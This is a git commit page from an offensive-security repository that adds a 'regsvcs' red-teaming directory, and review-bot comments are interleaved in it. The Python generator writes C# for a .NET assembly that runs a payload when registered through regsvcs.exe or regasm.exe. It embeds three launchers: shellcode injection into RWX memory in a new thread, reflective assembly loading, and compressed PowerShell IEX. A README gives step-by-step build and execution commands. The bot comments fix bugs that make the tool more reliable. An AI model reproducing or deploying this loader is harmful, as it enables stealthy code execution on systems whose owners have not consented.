Added regsvcs directory
This commit is contained in:
parent
4bd6cfe600
commit
2af3ce7d73
@ -316,6 +316,8 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
|
||||||
|
|
||||||
|
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives.
|
||||||
|
|
||||||
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
|
||||||
|
|
||||||
|
|
||||||
|
@ -274,7 +274,7 @@ def minimize(output):
|
|||||||
|
|
||||||
def opts(argv):
|
def opts(argv):
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script or PE/EXE file.')
|
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
|
||||||
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
|
||||||
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
@ -296,7 +296,7 @@ def main(argv):
|
|||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
print('Usage: ./generateMSBuildPowershellXML.py <inputFile>')
|
print('Usage: ./generateMSBuildXML.py <inputFile>')
|
||||||
sys.exit(-1)
|
sys.exit(-1)
|
||||||
|
|
||||||
args = opts(argv)
|
args = opts(argv)
|
||||||
|
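Review bot: The new `inputFile` help text advertises raw binary shellcode as a supported input, but the only type switch visible in this hunk is `-e/--exe`, whose help only distinguishes a Mono/.NET assembly from everything else — nothing lets the caller mark the file as shellcode. If a `-r/--raw` flag is added further down (outside this hunk) that is fine; otherwise either add it or trim the help to `May be either Powershell script or .NET Assembly (PE/EXE) file.` so the usage text and the inputs the script actually distinguishes agree. `opts` continues past the hunk, so I cannot confirm which from here.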
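--- a/red-teaming/regsvcs/README.md
+++ b/red-teaming/regsvcs/README.md
@@ -0,0 +1,46 @@
+## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
+
+Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
+
+### Step 1: Generate key.snk file
+
+```
+powershell -file build.ps1
+```
+
+### Step 2: Generate source code file
+
+```
+python3 generateRegsvcs.py -r payload.bin > program.cs
+```
+
+### Step 3: Compilate library .NET Assembly
+
+```
+%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
+```
+
+If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
+
+```
+%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
+```
+
+
+### Step 4: Code execution via Regsvcs or Regasm:
+
+```
+%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
+```
+or
+```
+%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
+```
+or
+```
+%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
+```
+or
+```
+%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
+```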
BIN
red-teaming/regsvcs/System.Management.Automation.dll
Normal file
BIN
red-teaming/regsvcs/System.Management.Automation.dll
Normal file
Binary file not shown.
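--- a/red-teaming/regsvcs/build.ps1
+++ b/red-teaming/regsvcs/build.ps1
@@ -0,0 +1,5 @@
+$key = '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'
+$Content = [System.Convert]::FromBase64String($key)
+Set-Content key.snk -Value $Content -Encoding Byte
+
+& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs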
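Review bot: `Set-Content -Encoding Byte` only exists in Windows PowerShell 5.1; PowerShell 6/7 removed that `-Encoding` value (it became `-AsByteStream`), so on a newer host the key file is never written and the csc.exe call on the next line fails on the missing `/keyfile`; a version-neutral write is `[IO.File]::WriteAllBytes("$PWD\key.snk", $Content)`. The script also hard-codes the `Framework64` csc.exe path and compiles `program.cs`, although the README's Step 1 presents it as only generating `key.snk`; a header comment such as `# Writes key.snk AND compiles program.cs with the 64-bit csc.exe — run after generateRegsvcs.py` would remove that surprise. Finally, the strong-name key is shipped as a base64 blob in this public repo (and again inside generateRegsvcs.py), so every assembly built with it carries the same public-key token; operators who do not want that fingerprint should be told to generate their own with `sn -k key.snk`.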
360
red-teaming/regsvcs/generateRegsvcs.py
Normal file
360
red-teaming/regsvcs/generateRegsvcs.py
Normal file
@ -0,0 +1,360 @@
|
|||||||
|
#!/usr/bin/python3
|
||||||
|
#
|
||||||
|
# Red-Teaming script that constructs C# code for Regsvcs code execution technique.
|
||||||
|
#
|
||||||
|
# Step 1: Generate source code file
|
||||||
|
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs
|
||||||
|
#
|
||||||
|
# Step 2: Compilate library .NET Assembly
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
#
|
||||||
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
|
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
|
# Then proper compilation command will be:
|
||||||
|
#
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Step 3: Code execution via Regsvcs or Regasm:
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
|
||||||
|
# or
|
||||||
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
|
||||||
|
#
|
||||||
|
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
#
|
||||||
|
|
||||||
|
import re
|
||||||
|
import os
|
||||||
|
import io
|
||||||
|
import sys
|
||||||
|
import gzip
|
||||||
|
import base64
|
||||||
|
import string
|
||||||
|
import struct
|
||||||
|
import random
|
||||||
|
import binascii
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
|
def getCompressedPayload(filePath):
|
||||||
|
out = io.BytesIO()
|
||||||
|
encoded = ''
|
||||||
|
with open(filePath, 'rb') as f:
|
||||||
|
inp = f.read()
|
||||||
|
|
||||||
|
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
|
||||||
|
fo.write(inp)
|
||||||
|
|
||||||
|
encoded = base64.b64encode(out.getvalue())
|
||||||
|
|
||||||
|
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
|
||||||
|
encoded.decode()
|
||||||
|
)
|
||||||
|
return powershell
|
||||||
|
|
||||||
|
def getSourceFileContents(payload, _format):
|
||||||
|
launchCode = ''
|
||||||
|
usings = ''
|
||||||
|
|
||||||
|
if _format == 'exe':
|
||||||
|
|
||||||
|
exeLaunchCode = string.Template('''
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
string payload = "$payload2";
|
||||||
|
byte[] decoded = System.Convert.FromBase64String(payload);
|
||||||
|
|
||||||
|
Assembly asm = Assembly.Load(decoded);
|
||||||
|
MethodInfo method = asm.EntryPoint;
|
||||||
|
object instance = asm.CreateInstance(method.Name);
|
||||||
|
method.Invoke(instance, null);
|
||||||
|
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
launchCode = exeLaunchCode
|
||||||
|
|
||||||
|
elif _format == 'raw':
|
||||||
|
|
||||||
|
foo = str(binascii.hexlify(payload), 'ascii')
|
||||||
|
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
|
||||||
|
encodedPayload = ' '
|
||||||
|
|
||||||
|
for i in range(len(fooarr)):
|
||||||
|
if i % 16 == 0 and i > 0:
|
||||||
|
encodedPayload += '\n '
|
||||||
|
encodedPayload += '{}, '.format(fooarr[i])
|
||||||
|
|
||||||
|
encodedPayload = encodedPayload.strip()[:-1]
|
||||||
|
|
||||||
|
shellcodeLoader = string.Template('''
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr VirtualAlloc(
|
||||||
|
IntPtr lpAddress, UIntPtr dwSize,
|
||||||
|
UInt32 flAllocationType,
|
||||||
|
UInt32 flProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool VirtualFree(
|
||||||
|
IntPtr lpAddress,
|
||||||
|
UInt32 dwSize,
|
||||||
|
UInt32 dwFreeType
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern IntPtr CreateThread(
|
||||||
|
UInt32 lpThreadAttributes,
|
||||||
|
UInt32 dwStackSize,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr param,
|
||||||
|
UInt32 dwCreationFlags,
|
||||||
|
ref UInt32 lpThreadId
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern bool CloseHandle(
|
||||||
|
IntPtr hHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
[DllImport("kernel32")]
|
||||||
|
private static extern UInt32 WaitForSingleObject(
|
||||||
|
IntPtr hHandle,
|
||||||
|
UInt32 dwMilliseconds
|
||||||
|
);
|
||||||
|
|
||||||
|
private static UInt32 MEM_COMMIT = 0x1000;
|
||||||
|
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||||
|
private static UInt32 MEM_RELEASE = 0x8000;
|
||||||
|
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = new byte[$payloadSize] {
|
||||||
|
$payload2
|
||||||
|
};
|
||||||
|
|
||||||
|
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
Marshal.Copy(payload, 0, funcAddr, payload.Length);
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
UInt32 threadId = 0;
|
||||||
|
|
||||||
|
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
|
||||||
|
WaitForSingleObject(hThread, 0xFFFFFFFF);
|
||||||
|
|
||||||
|
CloseHandle(hThread);
|
||||||
|
VirtualFree(funcAddr, 0, MEM_RELEASE);
|
||||||
|
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = encodedPayload,
|
||||||
|
payloadSize = len(payload)
|
||||||
|
)
|
||||||
|
|
||||||
|
launchCode = shellcodeLoader
|
||||||
|
|
||||||
|
else:
|
||||||
|
usings += '''
|
||||||
|
using System.Management.Automation;
|
||||||
|
using System.Management.Automation.Runspaces;
|
||||||
|
'''
|
||||||
|
powershellLaunchCode = string.Template('''
|
||||||
|
public static void Execute() {
|
||||||
|
|
||||||
|
byte[] payload = System.Convert.FromBase64String("$payload2");
|
||||||
|
string decoded = System.Text.Encoding.UTF8.GetString(payload);
|
||||||
|
|
||||||
|
Runspace runspace = RunspaceFactory.CreateRunspace();
|
||||||
|
runspace.Open();
|
||||||
|
|
||||||
|
Pipeline pipeline = runspace.CreatePipeline();
|
||||||
|
pipeline.Commands.AddScript(decoded);
|
||||||
|
pipeline.Invoke();
|
||||||
|
|
||||||
|
runspace.Close();
|
||||||
|
}''').safe_substitute(
|
||||||
|
payload2 = base64.b64encode(payload.encode()).decode()
|
||||||
|
)
|
||||||
|
|
||||||
|
launchCode = powershellLaunchCode
|
||||||
|
|
||||||
|
|
||||||
|
template = string.Template('''
|
||||||
|
using System;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.EnterpriseServices;
|
||||||
|
$usings
|
||||||
|
|
||||||
|
/*
|
||||||
|
Author: Casey Smith, Twitter: @subTee
|
||||||
|
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
License: BSD 3-Clause
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = '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'
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
||||||
|
*/
|
||||||
|
|
||||||
|
namespace Program
|
||||||
|
{
|
||||||
|
public class Bypass : ServicedComponent
|
||||||
|
{
|
||||||
|
public Bypass()
|
||||||
|
{
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration is successful
|
||||||
|
[ComRegisterFunction]
|
||||||
|
public static void RegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
|
||||||
|
// This executes if registration fails
|
||||||
|
[ComUnregisterFunction]
|
||||||
|
public static void UnRegisterClass( string key )
|
||||||
|
{
|
||||||
|
Shellcode.Execute();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
public class Shellcode
|
||||||
|
{
|
||||||
|
$launchCode
|
||||||
|
}
|
||||||
|
}''').safe_substitute(
|
||||||
|
launchCode = launchCode,
|
||||||
|
usings = usings
|
||||||
|
)
|
||||||
|
|
||||||
|
return template
|
||||||
|
|
||||||
|
def detectFileIsExe(filePath, forced = False):
|
||||||
|
first1000 = []
|
||||||
|
|
||||||
|
with open(filePath, 'rb') as f:
|
||||||
|
first1000 = f.read()[:1000]
|
||||||
|
|
||||||
|
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
|
||||||
|
|
||||||
|
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
dosStub = "This program cannot be run in DOS mode."
|
||||||
|
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
|
||||||
|
|
||||||
|
#if not dosStub in printables:
|
||||||
|
# return False
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
def opts(argv):
|
||||||
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
|
||||||
|
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
|
||||||
|
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
|
||||||
|
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if args.exe and args.raw:
|
||||||
|
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
return args
|
||||||
|
|
||||||
|
def main(argv):
|
||||||
|
sys.stderr.write('''
|
||||||
|
:: Regsvcs Code Execution Source code generation utility
|
||||||
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
|
||||||
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
|
''')
|
||||||
|
if len(argv) < 2:
|
||||||
|
print('Usage: ./generateRegsvcs.py <inputFile>')
|
||||||
|
sys.exit(-1)
|
||||||
|
|
||||||
|
args = opts(argv)
|
||||||
|
|
||||||
|
_format = 'powershell'
|
||||||
|
|
||||||
|
if args.exe:
|
||||||
|
if not detectFileIsExe(args.inputFile, args.exe):
|
||||||
|
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
|
||||||
|
return False
|
||||||
|
|
||||||
|
_format = 'exe'
|
||||||
|
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
|
||||||
|
with open(args.inputFile, 'rb') as f:
|
||||||
|
payload = f.read()
|
||||||
|
|
||||||
|
elif args.raw:
|
||||||
|
_format = 'raw'
|
||||||
|
sys.stderr.write('[?] File specified as raw Shellcode.\n\n')
|
||||||
|
with open(args.inputFile, 'rb') as f:
|
||||||
|
payload = f.read()
|
||||||
|
|
||||||
|
else:
|
||||||
|
sys.stderr.write('[?] Powershell code given.\n')
|
||||||
|
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n')
|
||||||
|
sys.stderr.write(' Obtain them from: .\n\n')
|
||||||
|
|
||||||
|
if args.inputFile.endswith('.exe'):
|
||||||
|
return False
|
||||||
|
|
||||||
|
payload = getCompressedPayload(args.inputFile)
|
||||||
|
|
||||||
|
output = getSourceFileContents(payload, _format)
|
||||||
|
|
||||||
|
print(output)
|
||||||
|
|
||||||
|
management = ''
|
||||||
|
if _format == 'powershell':
|
||||||
|
management = ' /r:System.Management.Automation.dll'
|
||||||
|
|
||||||
|
commands = '''
|
||||||
|
|
||||||
|
=====================================
|
||||||
|
|
||||||
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
|
|
||||||
|
$key = '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'
|
||||||
|
$Content = [System.Convert]::FromBase64String($key)
|
||||||
|
Set-Content key.snk -Value $Content -Encoding Byte
|
||||||
|
|
||||||
|
Step 2: Compile source code:
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
|
Step 3: Execute your payload!
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll
|
||||||
|
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
|
||||||
|
'''.format(management)
|
||||||
|
|
||||||
|
if 'PROGRAMFILES(X86)' in os.environ:
|
||||||
|
commands = commands.replace('Framework', 'Framework64')
|
||||||
|
|
||||||
|
sys.stderr.write(commands)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main(sys.argv)
|
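Review bot: `detectFileIsExe` cannot return True under Python 3 (the shebang is `#!/usr/bin/python3`): `first1000` is `bytes`, so `first1000[0]` is an `int` and `first1000[0] == 'M'` is always False, which means every `--exe` run ends in `[?] File not recognized as PE/EXE.` The same function also unpacks `e_lfanew` with `'<H'` although it is a 4-byte DWORD at offset 0x3c, and the later `x in string.printable` would raise `TypeError` on an `int`. Once the check works, the `exe` branch of `getSourceFileContents` calls `payload.encode()` on data that `main` read in `'rb'` mode, so it needs `payload2 = base64.b64encode(payload).decode()` to avoid an `AttributeError`. A corrected check is below; the inherited loader's `asm.CreateInstance(method.Name)` also looks wrong for a static `Main`, but I have not verified that here.

```python
def detectFileIsExe(filePath, forced = False):
    with open(filePath, 'rb') as f:
        first1000 = f.read()[:1000]

    # bytes indexing yields ints under Python 3: compare slices to bytes literals
    if len(first1000) < 0x40 or first1000[:2] != b'MZ':
        return False

    # e_lfanew is a 4-byte DWORD at offset 0x3c
    elfanew = struct.unpack_from('<I', first1000, 0x3c)[0]

    # an out-of-range offset yields an empty slice, which simply fails the compare
    return first1000[elfanew:elfanew + 2] == b'PE'
```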
BIN
red-teaming/regsvcs/key.snk
Normal file
BIN
red-teaming/regsvcs/key.snk
Normal file
Binary file not shown.
BIN
red-teaming/regsvcs/program.cs
Normal file
BIN
red-teaming/regsvcs/program.cs
Normal file
Binary file not shown.
BIN
red-teaming/regsvcs/regsvcs.dll
Normal file
BIN
red-teaming/regsvcs/regsvcs.dll
Normal file
Binary file not shown.